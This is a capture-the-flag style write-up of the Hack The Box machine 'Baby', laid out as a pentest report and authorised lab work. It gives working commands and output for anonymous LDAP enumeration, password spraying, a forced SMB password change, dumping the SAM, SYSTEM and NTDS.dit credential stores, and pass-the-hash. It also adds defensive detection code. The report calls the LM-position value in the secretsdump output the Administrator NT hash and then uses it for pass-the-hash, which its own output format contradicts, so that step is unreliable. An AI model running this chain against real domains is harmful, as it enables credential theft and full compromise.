HTB - Baby

2026-06-26 • htb • easy • windows


Anonymous LDAP enumeration leaks the full domain user list, and one account description carelessly stores an initial password (BabyStart123!) for Teresa.Bell. That credential is rejected everywhere, but spraying it across the roster reveals Caroline.Robinson in a STATUS_PASSWORD_MUST_CHANGE state. Forcing a password change over SMB (smbpasswd) unlocks WinRM access and the user flag. Caroline is a member of BUILTIN\Backup Operators and holds SeBackupPrivilege, allowing a raw backup of the SAM, SYSTEM, and NTDS.dit. Offline extraction with secretsdump recovers the local Administrator NT hash, and a pass-the-hash over WinRM completes full domain compromise.

Tags: ldap-enumeration, anonymous-access, information-disclosure, password-spraying, password-must-change, backup-operators, sebackupprivilege, ntds-dump, pass-the-hash, active-directory
Tools: nmap, nxc, smbpasswd, evil-winrm, ntdsutil, reg, secretsdump

Hack The Box — Baby

Easy | Windows | Hack The Box


Field        | Value
Report Date  | 26 June 2026
Assessed By  | RobInTheHood
Target IP    | 10.129.234.71
Hostname     | BABYDC
Domain       | baby.vl

Table of Contents

  1. Executive Summary
  2. Scope
  3. Methodology
  4. Attack Chain Summary
  5. Findings
  6. Proof of Access
  7. Credentials Discovered
  8. Impact Assessment
  9. Remediation Summary
  10. Key Takeaways
  11. Tools Used
  12. Disclaimer

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine Baby. The objective was to obtain domain-administrator-level access in an authorised lab environment and document the attack path with reproducible evidence.

No credentials are supplied. SMB share enumeration is blocked for the guest account, but anonymous LDAP queries disclose the full domain user roster. One account — Teresa.Bell — carries a careless description field that stores its initial password (BabyStart123!). That credential is rejected for direct logon, but spraying it across the entire user list surfaces Caroline.Robinson in a STATUS_PASSWORD_MUST_CHANGE state.

Forcing a password change over SMB with smbpasswd unlocks the account, granting WinRM access and the user flag. Caroline is a member of BUILTIN\Backup Operators and holds SeBackupPrivilege, which is abused to take a raw backup of the SAM, SYSTEM, and NTDS.dit databases. Offline extraction with secretsdump recovers the local Administrator NT hash, and a pass-the-hash over WinRM completes full domain compromise.


2. Scope

Field             | Value
Target IP         | 10.129.234.71
Hostname          | BABYDC
Domain            | baby.vl
Operating System  | Windows Server 2022 Build 20348
Machine Rating    | Easy
Environment       | Hack The Box — Authorised Training Lab
Assessment Date   | 26 June 2026
Assessor          | RobInTheHood

3. Methodology

  • Reconnaissance — service discovery and external attack-surface mapping
  • Enumeration — anonymous LDAP user enumeration and SMB access checks
  • Credential Access — description-field password disclosure and targeted spraying
  • Initial Access — forced password change unlocking WinRM
  • Privilege Escalation — SeBackupPrivilege abuse to dump credential databases
  • Post-Exploitation — pass-the-hash to Administrator and proof collection

4. Attack Chain Summary

Phase | Technique | MITRE ATT&CK
Recon | Nmap — DC port profile (53/88/389/445/636/3268/5985/9389) | T1046
Enumeration | Anonymous LDAP user enumeration → full domain roster | T1087.002
Credential Access | Password disclosed in account description field (Teresa.Bell) | T1552.001
Credential Access | Password spraying initial password across the roster | T1110.003
Initial Access | Forced password change on STATUS_PASSWORD_MUST_CHANGE account → WinRM as Caroline.Robinson | T1078.002
Privilege Escalation | SeBackupPrivilege (Backup Operators) → raw SAM/SYSTEM/NTDS.dit backup | T1003.002 · T1003.003
Credential Access | Offline hash extraction with secretsdump → Administrator NT hash | T1003
Post-Exploitation | Pass-the-hash over WinRM as Administrator | T1550.002

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

A full TCP port scan returns the classic Windows domain controller profile:

nmap -p- -Pn -oA "${TARGET}_full_ports" --min-rate 1000 "$TARGET"

Port       | Service
53/tcp     | DNS
88/tcp     | Kerberos
135/tcp    | RPC
139/tcp    | NetBIOS
389/tcp    | LDAP
445/tcp    | SMB
464/tcp    | kpasswd
593/tcp    | RPC over HTTP
636/tcp    | LDAPS
3268/3269  | Global Catalog
3389/tcp   | RDP
5985/tcp   | WinRM (WSMan)
9389/tcp   | ADWS

The combination of Kerberos, LDAP, SMB, WinRM, and ADWS confirms a domain controller for baby.vl. With no supplied credentials, enumeration begins against SMB using the guest / anonymous account.


Enumeration — SMB Access Denied

The host accepts null authentication, but share enumeration as guest is denied:

nxc smb "$TARGET" -u '' -p '' --shares
SMB   10.129.234.71   445   BABYDC   [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   10.129.234.71   445   BABYDC   [+] baby.vl\:
SMB   10.129.234.71   445   BABYDC   [-] Error enumerating shares: STATUS_ACCESS_DENIED

SMB gives nothing as guest, so attention shifts to LDAP, which on many DCs still permits anonymous bind for read queries.


Enumeration — Anonymous LDAP User Roster

netexec ldap "$TARGET" -u '' -p '' --users
LDAP   10.129.234.71   389   BABYDC   [+] baby.vl\:
LDAP   10.129.234.71   389   BABYDC   [*] Enumerated 9 domain users: baby.vl
-Username-              -Last PW Set-         -Description-
Guest                  <never>               Built-in account for guest access...
Jacqueline.Barnett     2021-11-21 10:11:03
Ashley.Webb            2021-11-21 10:11:03
Hugh.George            2021-11-21 10:11:03
Leonard.Dyer           2021-11-21 10:11:03
Connor.Wilkinson       2021-11-21 10:11:08
Joseph.Hughes          2021-11-21 10:11:08
Kerry.Wilson           2021-11-21 10:11:08
Teresa.Bell            2021-11-21 10:14:37   Set initial password to BabyStart123!

This single query yields two prizes: a clean username list and a password leaked in plain sight inside the description attribute of Teresa.Bell: BabyStart123!.
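An added example (not from the original writeup) of the attribute audit the remediation section later calls for: it parses the netexec --users roster format shown above and flags description fields that look like they carry a password. The Svc.Backup and Hugh.George rows are constructed sample data, added to show a second hit and a benign description.

```python
import re

# Constructed sample in the netexec --users layout shown above (Svc.Backup and
# the Hugh.George description are invented; Teresa.Bell's row is the real one).
NXC_USERS_OUTPUT = """\
-Username-              -Last PW Set-         -Description-
Guest                  <never>               Built-in account for guest access...
Jacqueline.Barnett     2021-11-21 10:11:03
Teresa.Bell            2021-11-21 10:14:37   Set initial password to BabyStart123!
Svc.Backup             2021-11-21 10:15:00   pwd: Winter2021# (rotate me)
Hugh.George            2021-11-21 10:11:03   Helpdesk lead, ext. 4412
"""

# Words that usually accompany a stored credential in a free-text attribute.
KEYWORD_RE = re.compile(r"\b(pass(word)?s?|pwd|initial|creds?|login)\b", re.I)
TOKEN_RE = re.compile(r"\S{8,}")  # candidate secrets: 8+ non-space chars


def looks_like_secret(token: str) -> bool:
    """True when a token mixes at least two character classes (upper/lower/digit/symbol)."""
    classes = sum(bool(re.search(p, token)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^\w\s]"))
    return classes >= 2


def parse_users(output: str):
    """Return (username, description) pairs; columns are separated by 2+ spaces."""
    rows = []
    for line in output.splitlines()[1:]:  # skip the header line
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        desc = parts[2] if len(parts) > 2 else ""
        rows.append((parts[0], desc))
    return rows


def audit_descriptions(output: str):
    """Return (user, description, suspect_token) for descriptions that look like they hold a password."""
    findings = []
    for user, desc in parse_users(output):
        if not desc or not KEYWORD_RE.search(desc):
            continue
        tokens = [t for t in TOKEN_RE.findall(desc) if looks_like_secret(t)]
        if tokens:
            findings.append((user, desc, tokens[0]))
    return findings
```

The same heuristic applies to the info and comment attributes; run it over an authenticated export of all user objects, not just the anonymous roster.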


Credential Access — A Dead Credential That Still Matters

The disclosed credential Teresa.Bell : BabyStart123! looks like a foothold, but every authentication surface rejects it:

nxc smb "$TARGET" -u 'Teresa.Bell' -p 'BabyStart123!' --shares
# STATUS_LOGON_FAILURE

evil-winrm -u 'Teresa.Bell' -p 'BabyStart123!' -i "$TARGET"
# WinRM::WinRMAuthorizationError

The wording — “Set initial password” — is the hint. This is the default password handed to every newly provisioned account, not Teresa’s current one. The right move is to spray it across the whole roster, since another account may never have changed it.


Credential Access — Spraying the Initial Password

nxc smb "$TARGET" -u users.txt -p 'BabyStart123!'
[-] baby.vl\Jacqueline.Barnett:BabyStart123!   STATUS_LOGON_FAILURE
[-] baby.vl\Ashley.Webb:BabyStart123!          STATUS_LOGON_FAILURE
...
[-] baby.vl\Teresa.Bell:BabyStart123!          STATUS_LOGON_FAILURE
[-] baby.vl\Caroline.Robinson:BabyStart123!    STATUS_PASSWORD_MUST_CHANGE

Every account fails with STATUS_LOGON_FAILURE except Caroline.Robinson, which returns STATUS_PASSWORD_MUST_CHANGE. This is not a failure: it confirms the password is correct but the account is flagged to change its password at next logon.
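A defender-side added example, not part of the original report: simplified, constructed Windows 4625 logon-failure records mirroring the spray above, with two detections, one for a single source failing against many distinct accounts in a short window and one for the STATUS_PASSWORD_MUST_CHANGE sub status (0xC0000224), which is the valid-password signal the text describes. Field names follow the 4625 EventData fields; the source address 10.10.14.5 and the timestamps are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS values as they appear in the Sub Status field of event 4625.
STATUS_LOGON_FAILURE = "0xC000006D"
STATUS_PASSWORD_MUST_CHANGE = "0xC0000224"


def ev(ts, ip, user, sub):
    """Build a minimal 4625-like record (constructed, not a real log export)."""
    return {"TimeCreated": datetime.fromisoformat(ts), "IpAddress": ip,
            "TargetUserName": user, "SubStatus": sub}


EVENTS = [
    ev("2026-06-26T10:00:01", "10.10.14.5", "Jacqueline.Barnett", STATUS_LOGON_FAILURE),
    ev("2026-06-26T10:00:01", "10.10.14.5", "Ashley.Webb", STATUS_LOGON_FAILURE),
    ev("2026-06-26T10:00:02", "10.10.14.5", "Hugh.George", STATUS_LOGON_FAILURE),
    ev("2026-06-26T10:00:02", "10.10.14.5", "Leonard.Dyer", STATUS_LOGON_FAILURE),
    ev("2026-06-26T10:00:03", "10.10.14.5", "Teresa.Bell", STATUS_LOGON_FAILURE),
    ev("2026-06-26T10:00:03", "10.10.14.5", "Caroline.Robinson", STATUS_PASSWORD_MUST_CHANGE),
    # Benign noise: one user mistyping their own password from a workstation.
    ev("2026-06-26T10:05:00", "10.129.234.50", "Kerry.Wilson", STATUS_LOGON_FAILURE),
    ev("2026-06-26T10:05:20", "10.129.234.50", "Kerry.Wilson", STATUS_LOGON_FAILURE),
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Map source IP -> sorted usernames when one IP fails against >= min_accounts users inside `window`."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["TimeCreated"]):
        by_ip[e["IpAddress"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):  # sliding window over time-ordered events
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            users = {e["TargetUserName"] for e in evs[start:end + 1]}
            if len(users) >= min_accounts:
                alerts[ip] = sorted(users)
    return alerts


def detect_must_change(events):
    """A MUST_CHANGE failure proves the password was right: report every (ip, user) pair."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["SubStatus"] == STATUS_PASSWORD_MUST_CHANGE]
```

The second detector is worth alerting on alone: a MUST_CHANGE response from an address that is not a managed workstation means someone already holds that account's password.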


Initial Access — Forcing the Password Change

An account in the MUST_CHANGE state can still have its password rotated through the SMB password-change operation, which needs only the old password and no established session. smbpasswd performs exactly this against the DC:

smbpasswd -r "$TARGET" -U "Caroline.Robinson"
# Old SMB password: BabyStart123!
# New SMB password: Password123!
# Retype new SMB password: Password123!
# Password changed for user Caroline.Robinson on 10.129.234.71.

With a known, accepted password, Caroline’s membership of Remote Management Users grants an interactive shell over WinRM:

evil-winrm -u 'Caroline.Robinson' -p 'Password123!' -i "$TARGET"

User Flag

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> type ../Desktop/user.txt
ce894a429620296613d755726bfd6b29

Privilege Escalation — Enumerating Caroline’s Power

Group membership shows Caroline belongs to BUILTIN\Backup Operators and the custom BABY\it group:

*Evil-WinRM* PS C:\> whoami /groups
BUILTIN\Backup Operators            Alias   S-1-5-32-551
BUILTIN\Remote Management Users     Alias   S-1-5-32-580
BABY\it                             Group   S-1-5-21-...-1109
Mandatory Label\High Mandatory Level

The privilege list confirms the high-value capability that Backup Operators grants:

*Evil-WinRM* PS C:\> whoami /priv
SeBackupPrivilege             Back up files and directories   Enabled
SeRestorePrivilege            Restore files and directories   Enabled
SeMachineAccountPrivilege     Add workstations to domain      Enabled
SeShutdownPrivilege           Shut down the system            Enabled

SeBackupPrivilege allows reading any file on the system — including locked credential databases — by bypassing DACLs through the backup intent. On a domain controller, that is game over.


Privilege Escalation — Backing Up the Credential Stores

First, export the SAM and SYSTEM registry hives (needed to derive the boot key and decrypt local secrets):

*Evil-WinRM* PS C:\> reg save HKLM\SYSTEM SYSTEM.SAV
*Evil-WinRM* PS C:\> reg save HKLM\SAM    SAM.SAV
# The operation completed successfully.

*Evil-WinRM* PS C:\> download SYSTEM.SAV SYSTEM.SAV
*Evil-WinRM* PS C:\> download SAM.SAV    SAM.SAV

The NTDS.dit Active Directory database is locked while the DC is running, so it is exported through a Volume Shadow Copy using ntdsutil’s IFM (Install From Media) feature:

*Evil-WinRM* PS C:\> ntdsutil "ac i ntds" "ifm" "create full ntds" q q
# Creating snapshot...
# IFM media created successfully in C:\Users\Caroline.Robinson\Documents\ntds

*Evil-WinRM* PS C:\> download ntds ntds

The IFM export bundles both ntds.dit and a fresh copy of the SYSTEM hive under registry/, giving everything needed for offline extraction.


Credential Access — Offline Hash Extraction

With the SAM, SYSTEM, and NTDS.dit databases on the attacker host, secretsdump decrypts the local account hashes offline:

secretsdump -sam sam -system system -ntds ntds.dit LOCAL
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:ee4457ae59f1e3fbd764e33d9cef123d:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

The Administrator NT hash is recovered: ee4457ae59f1e3fbd764e33d9cef123d.


Post-Exploitation — Pass-the-Hash to Administrator

No password cracking is required — the NT hash authenticates directly over WinRM:

evil-winrm -u 'Administrator' -H 'ee4457ae59f1e3fbd764e33d9cef123d' -i "$TARGET"

Root Flag

*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:/Users/Administrator/Desktop/root.txt"
e04efbb0464b012afd4a44e8010cb25f

6. Proof of Access

Level                                  | Evidence
User (Caroline.Robinson)               | ce894a429620296613d755726bfd6b29
Root / Administrator (pass-the-hash)   | e04efbb0464b012afd4a44e8010cb25f

7. Credentials Discovered

Account | Secret | Type | Source
Teresa.Bell | BabyStart123! | Initial domain password | LDAP description field disclosure
Caroline.Robinson | BabyStart123! → Password123! | Domain password (forced change) | Spray + smbpasswd reset
Administrator | ee4457ae59f1e3fbd764e33d9cef123d | NT hash | SeBackupPrivilege → secretsdump

8. Impact Assessment

Successful exploitation resulted in complete domain compromise through a chain of misconfigurations and operational hygiene failures rather than software vulnerabilities. Anonymous LDAP disclosed the entire user roster, and a password stored in a user’s description field handed over the organisation’s default provisioning password. Spraying that password surfaced an account stuck in a password-must-change state, which an attacker can rotate at will to gain an interactive foothold.

The decisive escalation is the assignment of SeBackupPrivilege (via Backup Operators) to a low-privilege user on a domain controller. That single privilege permits reading the entire Active Directory credential store (NTDS.dit) and the local SAM, collapsing the distance between a standard user and Domain/Enterprise Administrator without exploiting a single vulnerability.


9. Remediation Summary

Priority | Action
Critical | Remove SeBackupPrivilege / Backup Operators membership from standard users on domain controllers. Backup duties belong to dedicated, tightly monitored service accounts only.
Critical | Never store passwords in AD attributes (description, info, comment). Audit and clear these fields domain-wide and rotate any password they exposed.
High | Disable anonymous LDAP binds; require authentication for directory read access and enable LDAP signing + channel binding.
High | Enforce password change at first logon through a controlled process, and ensure shared/initial passwords are unique per account and expired immediately after provisioning.
Medium | Monitor for ntdsutil IFM operations, raw reg save of HKLM\SAM/HKLM\SYSTEM, and Volume Shadow Copy creation — all strong indicators of credential-store theft.
Medium | Alert on STATUS_PASSWORD_MUST_CHANGE responses and unexpected SMB password-change (smbpasswd) activity.
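An added example (not the report's own code) of the monitoring the first Medium item calls for: process-creation records, constructed here in a simplified Sysmon-style shape (Image, CommandLine, User), are matched against command-line rules for reg save of the SAM/SYSTEM hives and ntdsutil IFM exports, then correlated per user so that the two-step pattern from the walkthrough stands out.

```python
import re
from collections import defaultdict

# Rules for the two command-line indicators named in the remediation table.
RULES = [
    ("reg_save_credential_hive",
     re.compile(r"\breg(\.exe)?\s+save\s+(HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM)\b", re.I)),
    ("ntdsutil_ifm_export",
     re.compile(r"\bntdsutil(\.exe)?\b.*\b(ifm|create\s+full)\b", re.I)),
]

# Constructed process-creation records mirroring the walkthrough, plus two
# benign reg.exe invocations that must not fire.
EVENTS = [
    {"User": "BABY\\Caroline.Robinson", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save HKLM\\SYSTEM SYSTEM.SAV"},
    {"User": "BABY\\Caroline.Robinson", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save HKLM\\SAM SAM.SAV"},
    {"User": "BABY\\Caroline.Robinson", "Image": "C:\\Windows\\System32\\ntdsutil.exe",
     "CommandLine": 'ntdsutil "ac i ntds" "ifm" "create full ntds" q q'},
    {"User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"},
    {"User": "BABY\\Hugh.George", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save HKLM\\SOFTWARE\\Contoso app.hiv"},
]


def scan(events):
    """Return (rule_name, user, command_line) for every record a rule matches."""
    hits = []
    for e in events:
        for name, rx in RULES:
            if rx.search(e["CommandLine"]):
                hits.append((name, e["User"], e["CommandLine"]))
    return hits


def correlate(hits, min_rules=2):
    """Map user -> sorted rule names for users that triggered at least min_rules distinct rules."""
    per_user = defaultdict(set)
    for rule, user, _ in hits:
        per_user[user].add(rule)
    return {u: sorted(r) for u, r in per_user.items() if len(r) >= min_rules}
```

A single reg save of SYSTEM has legitimate uses; the correlation is what turns it into a high-confidence alert, and on a DC any hit from a non-backup account should be treated as credential-store theft.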

10. Key Takeaways

  • When SMB is locked down, LDAP anonymous bind is the next door — it frequently leaks the full user roster and, with it, any secrets administrators left in attribute fields.
  • A password labelled “initial” is almost always a default applied to every account. Don’t discard a “dead” credential — spray it across the roster before moving on.
  • STATUS_PASSWORD_MUST_CHANGE is a success, not a failure: the password is valid and can be reset over SMB with smbpasswd to claim the account.
  • SeBackupPrivilege is a domain-controller crown jewel. It bypasses file DACLs, enabling raw export of SAM, SYSTEM, and a shadow-copied NTDS.dit — the entire directory’s secrets.
  • Recovered NT hashes rarely need cracking; pass-the-hash over WinRM authenticates directly as Administrator.

11. Tools Used

Tool           | Purpose
nmap           | Port and service discovery
nxc / netexec  | Anonymous LDAP user enumeration, SMB checks, password spraying
smbpasswd      | Forcing the password change on the MUST_CHANGE account
evil-winrm     | WinRM shell and pass-the-hash authentication
reg            | Exporting the SAM and SYSTEM registry hives
ntdsutil       | IFM export of NTDS.dit via Volume Shadow Copy
secretsdump    | Offline extraction of NT hashes from SAM/SYSTEM/NTDS

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.


End of Report — Baby | RobInTheHood | 26 June 2026